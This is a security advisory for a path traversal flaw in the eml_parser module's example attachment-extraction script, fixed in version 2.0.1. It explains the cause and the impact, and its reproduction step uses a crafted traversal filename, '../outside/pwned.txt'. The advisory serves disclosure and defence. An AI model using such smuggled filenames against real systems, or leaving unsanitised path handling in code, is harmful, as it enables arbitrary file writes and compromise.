eml_parser Path Traversal Vulnerability in Official Example Script Allowing Arbitrary File Write

A path traversal vulnerability has been identified in the official example script 'examples/recursively_extract_attachments.py' of the eml_parser Python module, prior to version 2.0.1. This vulnerability allows arbitrary file writes outside the intended output directory. The issue arises because attachment filenames extracted from parsed emails are used to create output file paths without proper sanitization, enabling an attacker to manipulate the filename and escape the target directory. The vulnerability has been patched in version 2.0.1.

Impact

Exploitation of this vulnerability could lead to arbitrary file writes outside the intended directory, with potential for more severe consequences depending on the file's location and the user's permissions. For example, an attacker could inject a file into a cron job or upload a web shell.

Reproduction

To reproduce this vulnerability, create a malicious .eml file with an attachment filename crafted to include path traversal sequences, such as '../outside/pwned.txt'. Then, run the 'recursively_extract_attachments.py' example script, specifying a safe output directory. The script will write the attachment file outside the intended directory, demonstrating the path traversal vulnerability.

Remediation

Users can update to eml_parser version 2.0.1 or later, where this vulnerability has been fixed.